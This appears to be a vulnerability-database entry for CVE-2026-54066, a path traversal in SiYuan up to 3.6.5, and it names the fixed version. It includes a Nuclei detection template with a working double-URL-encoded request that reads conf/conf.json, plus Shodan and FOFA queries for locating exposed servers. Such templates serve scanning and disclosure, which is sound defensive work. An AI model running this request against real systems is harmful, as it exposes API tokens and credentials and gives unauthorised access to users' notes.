| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2026-54066 | 24 Jun 202621:13 | – | attackerkb | |
| CVE-2026-54066 | 19 Jun 202607:23 | – | circl | |
| CVE-2026-54066 | 24 Jun 202621:13 | – | cve | |
| CVE-2026-54066 SiYuan: Path Traversal via Double URL Encoding in /assets/*path (publish mode arbitrary file─read) | 24 Jun 202621:13 | – | cvelist | |
| EUVD-2026-39122 | 24 Jun 202621:13 | – | euvd | |
| CVE-2026-54066 | 24 Jun 202622:16 | – | nvd | |
| PT-2026-52107 | 24 Jun 202600:00 | – | ptsecurity | |
| CVE-2026-54066 SiYuan: Path Traversal via Double URL Encoding in /assets/*path (publish mode arbitrary file─read) | 24 Jun 202621:13 | – | vulnrichment |
id: CVE-2026-54066
info:
name: SiYuan <= 3.6.5 - Unauthenticated Path Traversal
author: 0x_Akoko
severity: high
description: |
SiYuan <= 3.6.5 contains a path traversal via double URL-encoding in the /assets/ route (publish mode port 6808), allowing unauthenticated attackers to read arbitrary files inside WorkspaceDir including conf/conf.json which exposes the API token and access auth code.
impact: |
Unauthenticated attackers can read conf/conf.json exposing the API token, accessAuthCode SHA256 hash, and sync credentials, enabling full authenticated API access to all notebooks.
remediation: |
Update to SiYuan v3.7.0 or later.
reference:
- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-p4m3-mgmm-c664
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-54066
epss-score: 0.01892
epss-percentile: 0.7708
cwe-id: CWE-22
metadata:
verified: false
max-request: 1
vendor: siyuan-note
product: siyuan
shodan-query: port:6808 "SiYuan"
fofa-query: title="SiYuan" && port="6808"
tags: cve,cve2026,siyuan,path-traversal,lfi,unauth,publish-mode,disclosure
http:
- raw:
- |
GET /assets/%252e%252e/%252e%252e/conf/conf.json HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "accessAuthCode", "appearance", "editor", "system")'
condition: and
# digest: 4b0a00483046022100f1d4d0fd1509dff44d00e7f2073f834283e174a03b72b9f366a389e4506980cd02210084f7642ad46fe420e78f9f692ad590e6e6b250ad063a53d9c738b03f81a75178:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation